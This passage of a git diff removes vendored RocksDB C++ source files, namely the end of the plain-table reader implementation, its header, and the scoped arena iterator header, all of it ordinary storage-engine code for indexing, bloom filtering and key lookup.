-  ~PlainTableIterator();
-
-  bool Valid() const override;
-
-  void SeekToFirst() override;
-
-  void SeekToLast() override;
-
-  void Seek(const Slice& target) override;
-
-  void SeekForPrev(const Slice& target) override;
-
-  void Next() override;
-
-  void Prev() override;
-
-  Slice key() const override;
-
-  Slice value() const override;
-
-  Status status() const override;
-
- private:
-  PlainTableReader* table_;
-  PlainTableKeyDecoder decoder_;
-  bool use_prefix_seek_;
-  uint32_t offset_;
-  uint32_t next_offset_;
-  Slice key_;
-  Slice value_;
-  Status status_;
-  // No copying allowed
-  PlainTableIterator(const PlainTableIterator&) = delete;
-  void operator=(const Iterator&) = delete;
-};
-
-extern const uint64_t kPlainTableMagicNumber;
-PlainTableReader::PlainTableReader(const ImmutableCFOptions& ioptions,
-                                   unique_ptr<RandomAccessFileReader>&& file,
-                                   const EnvOptions& storage_options,
-                                   const InternalKeyComparator& icomparator,
-                                   EncodingType encoding_type,
-                                   uint64_t file_size,
-                                   const TableProperties* table_properties)
-    : internal_comparator_(icomparator),
-      encoding_type_(encoding_type),
-      full_scan_mode_(false),
-      user_key_len_(static_cast<uint32_t>(table_properties->fixed_key_len)),
-      prefix_extractor_(ioptions.prefix_extractor),
-      enable_bloom_(false),
-      bloom_(6, nullptr),
-      file_info_(std::move(file), storage_options,
-                 static_cast<uint32_t>(table_properties->data_size)),
-      ioptions_(ioptions),
-      file_size_(file_size),
-      table_properties_(nullptr) {}
-
-PlainTableReader::~PlainTableReader() {
-}
-
-Status PlainTableReader::Open(const ImmutableCFOptions& ioptions,
-                              const EnvOptions& env_options,
-                              const InternalKeyComparator& internal_comparator,
-                              unique_ptr<RandomAccessFileReader>&& file,
-                              uint64_t file_size,
-                              unique_ptr<TableReader>* table_reader,
-                              const int bloom_bits_per_key,
-                              double hash_table_ratio, size_t index_sparseness,
-                              size_t huge_page_tlb_size, bool full_scan_mode) {
-  if (file_size > PlainTableIndex::kMaxFileSize) {
-    return Status::NotSupported("File is too large for PlainTableReader!");
-  }
-
-  TableProperties* props = nullptr;
-  auto s = ReadTableProperties(file.get(), file_size, kPlainTableMagicNumber,
-                               ioptions, &props);
-  if (!s.ok()) {
-    return s;
-  }
-
-  assert(hash_table_ratio >= 0.0);
-  auto& user_props = props->user_collected_properties;
-  auto prefix_extractor_in_file = props->prefix_extractor_name;
-
-  if (!full_scan_mode &&
-      !prefix_extractor_in_file.empty() /* old version sst file*/
-      && prefix_extractor_in_file != "nullptr") {
-    if (!ioptions.prefix_extractor) {
-      return Status::InvalidArgument(
-          "Prefix extractor is missing when opening a PlainTable built "
-          "using a prefix extractor");
-    } else if (prefix_extractor_in_file.compare(
-                   ioptions.prefix_extractor->Name()) != 0) {
-      return Status::InvalidArgument(
-          "Prefix extractor given doesn't match the one used to build "
-          "PlainTable");
-    }
-  }
-
-  EncodingType encoding_type = kPlain;
-  auto encoding_type_prop =
-      user_props.find(PlainTablePropertyNames::kEncodingType);
-  if (encoding_type_prop != user_props.end()) {
-    encoding_type = static_cast<EncodingType>(
-        DecodeFixed32(encoding_type_prop->second.c_str()));
-  }
-
-  std::unique_ptr<PlainTableReader> new_reader(new PlainTableReader(
-      ioptions, std::move(file), env_options, internal_comparator,
-      encoding_type, file_size, props));
-
-  s = new_reader->MmapDataIfNeeded();
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (!full_scan_mode) {
-    s = new_reader->PopulateIndex(props, bloom_bits_per_key, hash_table_ratio,
-                                  index_sparseness, huge_page_tlb_size);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    // Flag to indicate it is a full scan mode so that none of the indexes
-    // can be used.
-    new_reader->full_scan_mode_ = true;
-  }
-
-  *table_reader = std::move(new_reader);
-  return s;
-}
-
-void PlainTableReader::SetupForCompaction() {
-}
-
-InternalIterator* PlainTableReader::NewIterator(const ReadOptions& options,
-                                                Arena* arena,
-                                                bool skip_filters) {
-  bool use_prefix_seek = !IsTotalOrderMode() && !options.total_order_seek;
-  if (arena == nullptr) {
-    return new PlainTableIterator(this, use_prefix_seek);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(PlainTableIterator));
-    return new (mem) PlainTableIterator(this, use_prefix_seek);
-  }
-}
-
-Status PlainTableReader::PopulateIndexRecordList(
-    PlainTableIndexBuilder* index_builder, vector<uint32_t>* prefix_hashes) {
-  Slice prev_key_prefix_slice;
-  std::string prev_key_prefix_buf;
-  uint32_t pos = data_start_offset_;
-
-  bool is_first_record = true;
-  Slice key_prefix_slice;
-  PlainTableKeyDecoder decoder(&file_info_, encoding_type_, user_key_len_,
-                               ioptions_.prefix_extractor);
-  while (pos < file_info_.data_end_offset) {
-    uint32_t key_offset = pos;
-    ParsedInternalKey key;
-    Slice value_slice;
-    bool seekable = false;
-    Status s = Next(&decoder, &pos, &key, nullptr, &value_slice, &seekable);
-    if (!s.ok()) {
-      return s;
-    }
-
-    key_prefix_slice = GetPrefix(key);
-    if (enable_bloom_) {
-      bloom_.AddHash(GetSliceHash(key.user_key));
-    } else {
-      if (is_first_record || prev_key_prefix_slice != key_prefix_slice) {
-        if (!is_first_record) {
-          prefix_hashes->push_back(GetSliceHash(prev_key_prefix_slice));
-        }
-        if (file_info_.is_mmap_mode) {
-          prev_key_prefix_slice = key_prefix_slice;
-        } else {
-          prev_key_prefix_buf = key_prefix_slice.ToString();
-          prev_key_prefix_slice = prev_key_prefix_buf;
-        }
-      }
-    }
-
-    index_builder->AddKeyPrefix(GetPrefix(key), key_offset);
-
-    if (!seekable && is_first_record) {
-      return Status::Corruption("Key for a prefix is not seekable");
-    }
-
-    is_first_record = false;
-  }
-
-  prefix_hashes->push_back(GetSliceHash(key_prefix_slice));
-  auto s = index_.InitFromRawData(index_builder->Finish());
-  return s;
-}
-
-void PlainTableReader::AllocateAndFillBloom(int bloom_bits_per_key,
-                                            int num_prefixes,
-                                            size_t huge_page_tlb_size,
-                                            vector<uint32_t>* prefix_hashes) {
-  if (!IsTotalOrderMode()) {
-    uint32_t bloom_total_bits = num_prefixes * bloom_bits_per_key;
-    if (bloom_total_bits > 0) {
-      enable_bloom_ = true;
-      bloom_.SetTotalBits(&arena_, bloom_total_bits, ioptions_.bloom_locality,
-                          huge_page_tlb_size, ioptions_.info_log);
-      FillBloom(prefix_hashes);
-    }
-  }
-}
-
-void PlainTableReader::FillBloom(vector<uint32_t>* prefix_hashes) {
-  assert(bloom_.IsInitialized());
-  for (auto prefix_hash : *prefix_hashes) {
-    bloom_.AddHash(prefix_hash);
-  }
-}
-
-Status PlainTableReader::MmapDataIfNeeded() {
-  if (file_info_.is_mmap_mode) {
-    // Get mmapped memory.
-    return file_info_.file->Read(0, file_size_, &file_info_.file_data, nullptr);
-  }
-  return Status::OK();
-}
-
-Status PlainTableReader::PopulateIndex(TableProperties* props,
-                                       int bloom_bits_per_key,
-                                       double hash_table_ratio,
-                                       size_t index_sparseness,
-                                       size_t huge_page_tlb_size) {
-  assert(props != nullptr);
-  table_properties_.reset(props);
-
-  BlockContents index_block_contents;
-  Status s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */,
-                           file_size_, kPlainTableMagicNumber, ioptions_,
-                           PlainTableIndexBuilder::kPlainTableIndexBlock,
-                           &index_block_contents);
-
-  bool index_in_file = s.ok();
-
-  BlockContents bloom_block_contents;
-  bool bloom_in_file = false;
-  // We only need to read the bloom block if index block is in file.
-  if (index_in_file) {
-    s = ReadMetaBlock(file_info_.file.get(), nullptr /* prefetch_buffer */,
-                      file_size_, kPlainTableMagicNumber, ioptions_,
-                      BloomBlockBuilder::kBloomBlock, &bloom_block_contents);
-    bloom_in_file = s.ok() && bloom_block_contents.data.size() > 0;
-  }
-
-  Slice* bloom_block;
-  if (bloom_in_file) {
-    // If bloom_block_contents.allocation is not empty (which will be the case
-    // for non-mmap mode), it holds the alloated memory for the bloom block.
-    // It needs to be kept alive to keep `bloom_block` valid.
-    bloom_block_alloc_ = std::move(bloom_block_contents.allocation);
-    bloom_block = &bloom_block_contents.data;
-  } else {
-    bloom_block = nullptr;
-  }
-
-  Slice* index_block;
-  if (index_in_file) {
-    // If index_block_contents.allocation is not empty (which will be the case
-    // for non-mmap mode), it holds the alloated memory for the index block.
-    // It needs to be kept alive to keep `index_block` valid.
-    index_block_alloc_ = std::move(index_block_contents.allocation);
-    index_block = &index_block_contents.data;
-  } else {
-    index_block = nullptr;
-  }
-
-  if ((ioptions_.prefix_extractor == nullptr) &&
-      (hash_table_ratio != 0)) {
-    // ioptions.prefix_extractor is requried for a hash-based look-up.
-    return Status::NotSupported(
-        "PlainTable requires a prefix extractor enable prefix hash mode.");
-  }
-
-  // First, read the whole file, for every kIndexIntervalForSamePrefixKeys rows
-  // for a prefix (starting from the first one), generate a record of (hash,
-  // offset) and append it to IndexRecordList, which is a data structure created
-  // to store them.
-
-  if (!index_in_file) {
-    // Allocate bloom filter here for total order mode.
-    if (IsTotalOrderMode()) {
-      uint32_t num_bloom_bits =
-          static_cast<uint32_t>(table_properties_->num_entries) *
-          bloom_bits_per_key;
-      if (num_bloom_bits > 0) {
-        enable_bloom_ = true;
-        bloom_.SetTotalBits(&arena_, num_bloom_bits, ioptions_.bloom_locality,
-                            huge_page_tlb_size, ioptions_.info_log);
-      }
-    }
-  } else if (bloom_in_file) {
-    enable_bloom_ = true;
-    auto num_blocks_property = props->user_collected_properties.find(
-        PlainTablePropertyNames::kNumBloomBlocks);
-
-    uint32_t num_blocks = 0;
-    if (num_blocks_property != props->user_collected_properties.end()) {
-      Slice temp_slice(num_blocks_property->second);
-      if (!GetVarint32(&temp_slice, &num_blocks)) {
-        num_blocks = 0;
-      }
-    }
-    // cast away const qualifier, because bloom_ won't be changed
-    bloom_.SetRawData(
-        const_cast<unsigned char*>(
-            reinterpret_cast<const unsigned char*>(bloom_block->data())),
-        static_cast<uint32_t>(bloom_block->size()) * 8, num_blocks);
-  } else {
-    // Index in file but no bloom in file. Disable bloom filter in this case.
-    enable_bloom_ = false;
-    bloom_bits_per_key = 0;
-  }
-
-  PlainTableIndexBuilder index_builder(&arena_, ioptions_, index_sparseness,
-                                       hash_table_ratio, huge_page_tlb_size);
-
-  std::vector<uint32_t> prefix_hashes;
-  if (!index_in_file) {
-    s = PopulateIndexRecordList(&index_builder, &prefix_hashes);
-    if (!s.ok()) {
-      return s;
-    }
-  } else {
-    s = index_.InitFromRawData(*index_block);
-    if (!s.ok()) {
-      return s;
-    }
-  }
-
-  if (!index_in_file) {
-    // Calculated bloom filter size and allocate memory for
-    // bloom filter based on the number of prefixes, then fill it.
-    AllocateAndFillBloom(bloom_bits_per_key, index_.GetNumPrefixes(),
-                         huge_page_tlb_size, &prefix_hashes);
-  }
-
-  // Fill two table properties.
-  if (!index_in_file) {
-    props->user_collected_properties["plain_table_hash_table_size"] =
-        ToString(index_.GetIndexSize() * PlainTableIndex::kOffsetLen);
-    props->user_collected_properties["plain_table_sub_index_size"] =
-        ToString(index_.GetSubIndexSize());
-  } else {
-    props->user_collected_properties["plain_table_hash_table_size"] =
-        ToString(0);
-    props->user_collected_properties["plain_table_sub_index_size"] =
-        ToString(0);
-  }
-
-  return Status::OK();
-}
-
-Status PlainTableReader::GetOffset(PlainTableKeyDecoder* decoder,
-                                   const Slice& target, const Slice& prefix,
-                                   uint32_t prefix_hash, bool& prefix_matched,
-                                   uint32_t* offset) const {
-  prefix_matched = false;
-  uint32_t prefix_index_offset;
-  auto res = index_.GetOffset(prefix_hash, &prefix_index_offset);
-  if (res == PlainTableIndex::kNoPrefixForBucket) {
-    *offset = file_info_.data_end_offset;
-    return Status::OK();
-  } else if (res == PlainTableIndex::kDirectToFile) {
-    *offset = prefix_index_offset;
-    return Status::OK();
-  }
-
-  // point to sub-index, need to do a binary search
-  uint32_t upper_bound;
-  const char* base_ptr =
-      index_.GetSubIndexBasePtrAndUpperBound(prefix_index_offset, &upper_bound);
-  uint32_t low = 0;
-  uint32_t high = upper_bound;
-  ParsedInternalKey mid_key;
-  ParsedInternalKey parsed_target;
-  if (!ParseInternalKey(target, &parsed_target)) {
-    return Status::Corruption(Slice());
-  }
-
-  // The key is between [low, high). Do a binary search between it.
-  while (high - low > 1) {
-    uint32_t mid = (high + low) / 2;
-    uint32_t file_offset = GetFixed32Element(base_ptr, mid);
-    uint32_t tmp;
-    Status s = decoder->NextKeyNoValue(file_offset, &mid_key, nullptr, &tmp);
-    if (!s.ok()) {
-      return s;
-    }
-    int cmp_result = internal_comparator_.Compare(mid_key, parsed_target);
-    if (cmp_result < 0) {
-      low = mid;
-    } else {
-      if (cmp_result == 0) {
-        // Happen to have found the exact key or target is smaller than the
-        // first key after base_offset.
-        prefix_matched = true;
-        *offset = file_offset;
-        return Status::OK();
-      } else {
-        high = mid;
-      }
-    }
-  }
-  // Both of the key at the position low or low+1 could share the same
-  // prefix as target. We need to rule out one of them to avoid to go
-  // to the wrong prefix.
-  ParsedInternalKey low_key;
-  uint32_t tmp;
-  uint32_t low_key_offset = GetFixed32Element(base_ptr, low);
-  Status s = decoder->NextKeyNoValue(low_key_offset, &low_key, nullptr, &tmp);
-  if (!s.ok()) {
-    return s;
-  }
-
-  if (GetPrefix(low_key) == prefix) {
-    prefix_matched = true;
-    *offset = low_key_offset;
-  } else if (low + 1 < upper_bound) {
-    // There is possible a next prefix, return it
-    prefix_matched = false;
-    *offset = GetFixed32Element(base_ptr, low + 1);
-  } else {
-    // target is larger than a key of the last prefix in this bucket
-    // but with a different prefix. Key does not exist.
-    *offset = file_info_.data_end_offset;
-  }
-  return Status::OK();
-}
-
-bool PlainTableReader::MatchBloom(uint32_t hash) const {
-  if (!enable_bloom_) {
-    return true;
-  }
-
-  if (bloom_.MayContainHash(hash)) {
-    PERF_COUNTER_ADD(bloom_sst_hit_count, 1);
-    return true;
-  } else {
-    PERF_COUNTER_ADD(bloom_sst_miss_count, 1);
-    return false;
-  }
-}
-
-Status PlainTableReader::Next(PlainTableKeyDecoder* decoder, uint32_t* offset,
-                              ParsedInternalKey* parsed_key,
-                              Slice* internal_key, Slice* value,
-                              bool* seekable) const {
-  if (*offset == file_info_.data_end_offset) {
-    *offset = file_info_.data_end_offset;
-    return Status::OK();
-  }
-
-  if (*offset > file_info_.data_end_offset) {
-    return Status::Corruption("Offset is out of file size");
-  }
-
-  uint32_t bytes_read;
-  Status s = decoder->NextKey(*offset, parsed_key, internal_key, value,
-                              &bytes_read, seekable);
-  if (!s.ok()) {
-    return s;
-  }
-  *offset = *offset + bytes_read;
-  return Status::OK();
-}
-
-void PlainTableReader::Prepare(const Slice& target) {
-  if (enable_bloom_) {
-    uint32_t prefix_hash = GetSliceHash(GetPrefix(target));
-    bloom_.Prefetch(prefix_hash);
-  }
-}
-
-Status PlainTableReader::Get(const ReadOptions& ro, const Slice& target,
-                             GetContext* get_context, bool skip_filters) {
-  // Check bloom filter first.
-  Slice prefix_slice;
-  uint32_t prefix_hash;
-  if (IsTotalOrderMode()) {
-    if (full_scan_mode_) {
-      status_ =
-          Status::InvalidArgument("Get() is not allowed in full scan mode.");
-    }
-    // Match whole user key for bloom filter check.
-    if (!MatchBloom(GetSliceHash(GetUserKey(target)))) {
-      return Status::OK();
-    }
-    // in total order mode, there is only one bucket 0, and we always use empty
-    // prefix.
-    prefix_slice = Slice();
-    prefix_hash = 0;
-  } else {
-    prefix_slice = GetPrefix(target);
-    prefix_hash = GetSliceHash(prefix_slice);
-    if (!MatchBloom(prefix_hash)) {
-      return Status::OK();
-    }
-  }
-  uint32_t offset;
-  bool prefix_match;
-  PlainTableKeyDecoder decoder(&file_info_, encoding_type_, user_key_len_,
-                               ioptions_.prefix_extractor);
-  Status s = GetOffset(&decoder, target, prefix_slice, prefix_hash,
-                       prefix_match, &offset);
-
-  if (!s.ok()) {
-    return s;
-  }
-  ParsedInternalKey found_key;
-  ParsedInternalKey parsed_target;
-  if (!ParseInternalKey(target, &parsed_target)) {
-    return Status::Corruption(Slice());
-  }
-  Slice found_value;
-  while (offset < file_info_.data_end_offset) {
-    s = Next(&decoder, &offset, &found_key, nullptr, &found_value);
-    if (!s.ok()) {
-      return s;
-    }
-    if (!prefix_match) {
-      // Need to verify prefix for the first key found if it is not yet
-      // checked.
-      if (GetPrefix(found_key) != prefix_slice) {
-        return Status::OK();
-      }
-      prefix_match = true;
-    }
-    // TODO(ljin): since we know the key comparison result here,
-    // can we enable the fast path?
-    if (internal_comparator_.Compare(found_key, parsed_target) >= 0) {
-      if (!get_context->SaveValue(found_key, found_value)) {
-        break;
-      }
-    }
-  }
-  return Status::OK();
-}
-
-uint64_t PlainTableReader::ApproximateOffsetOf(const Slice& key) {
-  return 0;
-}
-
-PlainTableIterator::PlainTableIterator(PlainTableReader* table,
-                                       bool use_prefix_seek)
-    : table_(table),
-      decoder_(&table_->file_info_, table_->encoding_type_,
-               table_->user_key_len_, table_->prefix_extractor_),
-      use_prefix_seek_(use_prefix_seek) {
-  next_offset_ = offset_ = table_->file_info_.data_end_offset;
-}
-
-PlainTableIterator::~PlainTableIterator() {
-}
-
-bool PlainTableIterator::Valid() const {
-  return offset_ < table_->file_info_.data_end_offset &&
-         offset_ >= table_->data_start_offset_;
-}
-
-void PlainTableIterator::SeekToFirst() {
-  next_offset_ = table_->data_start_offset_;
-  if (next_offset_ >= table_->file_info_.data_end_offset) {
-    next_offset_ = offset_ = table_->file_info_.data_end_offset;
-  } else {
-    Next();
-  }
-}
-
-void PlainTableIterator::SeekToLast() {
-  assert(false);
-  status_ = Status::NotSupported("SeekToLast() is not supported in PlainTable");
-}
-
-void PlainTableIterator::Seek(const Slice& target) {
-  if (use_prefix_seek_ != !table_->IsTotalOrderMode()) {
-    // This check is done here instead of NewIterator() to permit creating an
-    // iterator with total_order_seek = true even if we won't be able to Seek()
-    // it. This is needed for compaction: it creates iterator with
-    // total_order_seek = true but usually never does Seek() on it,
-    // only SeekToFirst().
-    status_ =
-        Status::InvalidArgument(
-          "total_order_seek not implemented for PlainTable.");
-    offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    return;
-  }
-
-  // If the user doesn't set prefix seek option and we are not able to do a
-  // total Seek(). assert failure.
-  if (table_->IsTotalOrderMode()) {
-    if (table_->full_scan_mode_) {
-      status_ =
-          Status::InvalidArgument("Seek() is not allowed in full scan mode.");
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    } else if (table_->GetIndexSize() > 1) {
-      assert(false);
-      status_ = Status::NotSupported(
-          "PlainTable cannot issue non-prefix seek unless in total order "
-          "mode.");
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    }
-  }
-
-  Slice prefix_slice = table_->GetPrefix(target);
-  uint32_t prefix_hash = 0;
-  // Bloom filter is ignored in total-order mode.
-  if (!table_->IsTotalOrderMode()) {
-    prefix_hash = GetSliceHash(prefix_slice);
-    if (!table_->MatchBloom(prefix_hash)) {
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-      return;
-    }
-  }
-  bool prefix_match;
-  status_ = table_->GetOffset(&decoder_, target, prefix_slice, prefix_hash,
-                              prefix_match, &next_offset_);
-  if (!status_.ok()) {
-    offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    return;
-  }
-
-  if (next_offset_ < table_->file_info_.data_end_offset) {
-    for (Next(); status_.ok() && Valid(); Next()) {
-      if (!prefix_match) {
-        // Need to verify the first key's prefix
-        if (table_->GetPrefix(key()) != prefix_slice) {
-          offset_ = next_offset_ = table_->file_info_.data_end_offset;
-          break;
-        }
-        prefix_match = true;
-      }
-      if (table_->internal_comparator_.Compare(key(), target) >= 0) {
-        break;
-      }
-    }
-  } else {
-    offset_ = table_->file_info_.data_end_offset;
-  }
-}
-
-void PlainTableIterator::SeekForPrev(const Slice& target) {
-  assert(false);
-  status_ =
-      Status::NotSupported("SeekForPrev() is not supported in PlainTable");
-}
-
-void PlainTableIterator::Next() {
-  offset_ = next_offset_;
-  if (offset_ < table_->file_info_.data_end_offset) {
-    Slice tmp_slice;
-    ParsedInternalKey parsed_key;
-    status_ =
-        table_->Next(&decoder_, &next_offset_, &parsed_key, &key_, &value_);
-    if (!status_.ok()) {
-      offset_ = next_offset_ = table_->file_info_.data_end_offset;
-    }
-  }
-}
-
-void PlainTableIterator::Prev() {
-  assert(false);
-}
-
-Slice PlainTableIterator::key() const {
-  assert(Valid());
-  return key_;
-}
-
-Slice PlainTableIterator::value() const {
-  assert(Valid());
-  return value_;
-}
-
-Status PlainTableIterator::status() const {
-  return status_;
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_reader.h b/thirdparty/rocksdb/table/plain_table_reader.h
deleted file mode 100644
index 6bf8da2..0000000
--- a/thirdparty/rocksdb/table/plain_table_reader.h
+++ /dev/null
@@ -1,234 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-
-#ifndef ROCKSDB_LITE
-#include <unordered_map>
-#include <memory>
-#include <vector>
-#include <string>
-#include <stdint.h>
-
-#include "db/dbformat.h"
-#include "rocksdb/env.h"
-#include "rocksdb/iterator.h"
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/table.h"
-#include "rocksdb/table_properties.h"
-#include "table/table_reader.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_index.h"
-#include "util/arena.h"
-#include "util/dynamic_bloom.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-class Block;
-struct BlockContents;
-class BlockHandle;
-class Footer;
-struct Options;
-class RandomAccessFile;
-struct ReadOptions;
-class TableCache;
-class TableReader;
-class InternalKeyComparator;
-class PlainTableKeyDecoder;
-class GetContext;
-class InternalIterator;
-
-using std::unique_ptr;
-using std::unordered_map;
-using std::vector;
-extern const uint32_t kPlainTableVariableLength;
-
-struct PlainTableReaderFileInfo {
-  bool is_mmap_mode;
-  Slice file_data;
-  uint32_t data_end_offset;
-  unique_ptr<RandomAccessFileReader> file;
-
-  PlainTableReaderFileInfo(unique_ptr<RandomAccessFileReader>&& _file,
-                           const EnvOptions& storage_options,
-                           uint32_t _data_size_offset)
-      : is_mmap_mode(storage_options.use_mmap_reads),
-        data_end_offset(_data_size_offset),
-        file(std::move(_file)) {}
-};
-
-// Based on following output file format shown in plain_table_factory.h
-// When opening the output file, IndexedTableReader creates a hash table
-// from key prefixes to offset of the output file. IndexedTable will decide
-// whether it points to the data offset of the first key with the key prefix
-// or the offset of it. If there are too many keys share this prefix, it will
-// create a binary search-able index from the suffix to offset on disk.
-//
-// The implementation of IndexedTableReader requires output file is mmaped
-class PlainTableReader: public TableReader {
- public:
-  static Status Open(const ImmutableCFOptions& ioptions,
-                     const EnvOptions& env_options,
-                     const InternalKeyComparator& internal_comparator,
-                     unique_ptr<RandomAccessFileReader>&& file,
-                     uint64_t file_size, unique_ptr<TableReader>* table,
-                     const int bloom_bits_per_key, double hash_table_ratio,
-                     size_t index_sparseness, size_t huge_page_tlb_size,
-                     bool full_scan_mode);
-
-  InternalIterator* NewIterator(const ReadOptions&,
-                                Arena* arena = nullptr,
-                                bool skip_filters = false) override;
-
-  void Prepare(const Slice& target) override;
-
-  Status Get(const ReadOptions&, const Slice& key, GetContext* get_context,
-             bool skip_filters = false) override;
-
-  uint64_t ApproximateOffsetOf(const Slice& key) override;
-
-  uint32_t GetIndexSize() const { return index_.GetIndexSize(); }
-  void SetupForCompaction() override;
-
-  std::shared_ptr<const TableProperties> GetTableProperties() const override {
-    return table_properties_;
-  }
-
-  virtual size_t ApproximateMemoryUsage() const override {
-    return arena_.MemoryAllocatedBytes();
-  }
-
-  PlainTableReader(const ImmutableCFOptions& ioptions,
-                   unique_ptr<RandomAccessFileReader>&& file,
-                   const EnvOptions& env_options,
-                   const InternalKeyComparator& internal_comparator,
-                   EncodingType encoding_type, uint64_t file_size,
-                   const TableProperties* table_properties);
-  virtual ~PlainTableReader();
-
- protected:
-  // Check bloom filter to see whether it might contain this prefix.
-  // The hash of the prefix is given, since it can be reused for index lookup
-  // too.
-  virtual bool MatchBloom(uint32_t hash) const;
-
-  // PopulateIndex() builds index of keys. It must be called before any query
-  // to the table.
-  //
-  // props: the table properties object that need to be stored. Ownership of
-  //        the object will be passed.
-  //
-
-  Status PopulateIndex(TableProperties* props, int bloom_bits_per_key,
-                       double hash_table_ratio, size_t index_sparseness,
-                       size_t huge_page_tlb_size);
-
-  Status MmapDataIfNeeded();
-
- private:
-  const InternalKeyComparator internal_comparator_;
-  EncodingType encoding_type_;
-  // represents plain table's current status.
-  Status status_;
-
-  PlainTableIndex index_;
-  bool full_scan_mode_;
-
-  // data_start_offset_ and data_end_offset_ defines the range of the
-  // sst file that stores data.
-  const uint32_t data_start_offset_ = 0;
-  const uint32_t user_key_len_;
-  const SliceTransform* prefix_extractor_;
-
-  static const size_t kNumInternalBytes = 8;
-
-  // Bloom filter is used to rule out non-existent key
-  bool enable_bloom_;
-  DynamicBloom bloom_;
-  PlainTableReaderFileInfo file_info_;
-  Arena arena_;
-  std::unique_ptr<char[]> index_block_alloc_;
-  std::unique_ptr<char[]> bloom_block_alloc_;
-
-  const ImmutableCFOptions& ioptions_;
-  uint64_t file_size_;
-  std::shared_ptr<const TableProperties> table_properties_;
-
-  bool IsFixedLength() const {
-    return user_key_len_ != kPlainTableVariableLength;
-  }
-
-  size_t GetFixedInternalKeyLength() const {
-    return user_key_len_ + kNumInternalBytes;
-  }
-
-  Slice GetPrefix(const Slice& target) const {
-    assert(target.size() >= 8);  // target is internal key
-    return GetPrefixFromUserKey(GetUserKey(target));
-  }
-
-  Slice GetPrefix(const ParsedInternalKey& target) const {
-    return GetPrefixFromUserKey(target.user_key);
-  }
-
-  Slice GetUserKey(const Slice& key) const {
-    return Slice(key.data(), key.size() - 8);
-  }
-
-  Slice GetPrefixFromUserKey(const Slice& user_key) const {
-    if (!IsTotalOrderMode()) {
-      return prefix_extractor_->Transform(user_key);
-    } else {
-      // Use empty slice as prefix if prefix_extractor is not set.
-      // In that case,
-      // it falls back to pure binary search and
-      // total iterator seek is supported.
-      return Slice();
-    }
-  }
-
-  friend class TableCache;
-  friend class PlainTableIterator;
-
-  // Internal helper function to generate an IndexRecordList object from all
-  // the rows, which contains index records as a list.
-  // If bloom_ is not null, all the keys' full-key hash will be added to the
-  // bloom filter.
-  Status PopulateIndexRecordList(PlainTableIndexBuilder* index_builder,
-                                 vector<uint32_t>* prefix_hashes);
-
-  // Internal helper function to allocate memory for bloom filter and fill it
-  void AllocateAndFillBloom(int bloom_bits_per_key, int num_prefixes,
-                            size_t huge_page_tlb_size,
-                            vector<uint32_t>* prefix_hashes);
-
-  void FillBloom(vector<uint32_t>* prefix_hashes);
-
-  // Read the key and value at `offset` to parameters for keys, the and
-  // `seekable`.
-  // On success, `offset` will be updated as the offset for the next key.
-  // `parsed_key` will be key in parsed format.
-  // if `internal_key` is not empty, it will be filled with key with slice
-  // format.
-  // if `seekable` is not null, it will return whether we can directly read
-  // data using this offset.
-  Status Next(PlainTableKeyDecoder* decoder, uint32_t* offset,
-              ParsedInternalKey* parsed_key, Slice* internal_key, Slice* value,
-              bool* seekable = nullptr) const;
-  // Get file offset for key target.
-  // return value prefix_matched is set to true if the offset is confirmed
-  // for a key with the same prefix as target.
-  Status GetOffset(PlainTableKeyDecoder* decoder, const Slice& target,
-                   const Slice& prefix, uint32_t prefix_hash,
-                   bool& prefix_matched, uint32_t* offset) const;
-
-  bool IsTotalOrderMode() const { return (prefix_extractor_ == nullptr); }
-
-  // No copying allowed
-  explicit PlainTableReader(const TableReader&) = delete;
-  void operator=(const TableReader&) = delete;
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/scoped_arena_iterator.h b/thirdparty/rocksdb/table/scoped_arena_iterator.h
deleted file mode 100644
index 1de570d..0000000
--- a/thirdparty/rocksdb/table/scoped_arena_iterator.h
+++ /dev/null
@@ -1,61 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-#pragma once
-
-#include "table/internal_iterator.h"
-#include "port/port.h"
-
-namespace rocksdb {
-class ScopedArenaIterator {
-
-  void reset(InternalIterator* iter) ROCKSDB_NOEXCEPT {
-    if (iter_ != nullptr) {
-      iter_->~InternalIterator();
-    }
-    iter_ = iter;
-  }
-
- public:
-
-  explicit ScopedArenaIterator(InternalIterator* iter = nullptr)
-      : iter_(iter) {}
-
-  ScopedArenaIterator(const ScopedArenaIterator&) = delete;
-  ScopedArenaIterator& operator=(const ScopedArenaIterator&) = delete;
-
-  ScopedArenaIterator(ScopedArenaIterator&& o) ROCKSDB_NOEXCEPT {
-    iter_ = o.iter_;
-    o.iter_ = nullptr;
-  }
-
-  ScopedArenaIterator& operator=(ScopedArenaIterator&& o) ROCKSDB_NOEXCEPT {
-    reset(o.iter_);
-    o.iter_ = nullptr;
-    return *this;
-  }
-
-  InternalIterator* operator->() { return iter_; }
-  InternalIterator* get() { return iter_; }
-
-  void set(InternalIterator* iter) { reset(iter); }
-
-  InternalIterator* release() {
-    assert(iter_ != nullptr);
-    auto* res = iter_;
-    iter_ = nullptr;
-    return res;
-  }
-
-  ~ScopedArenaIterator() {
-    reset(nullptr);
-  }
-
- private:
-  InternalIterator* iter_;
-};
-}  // namespace rocksdb
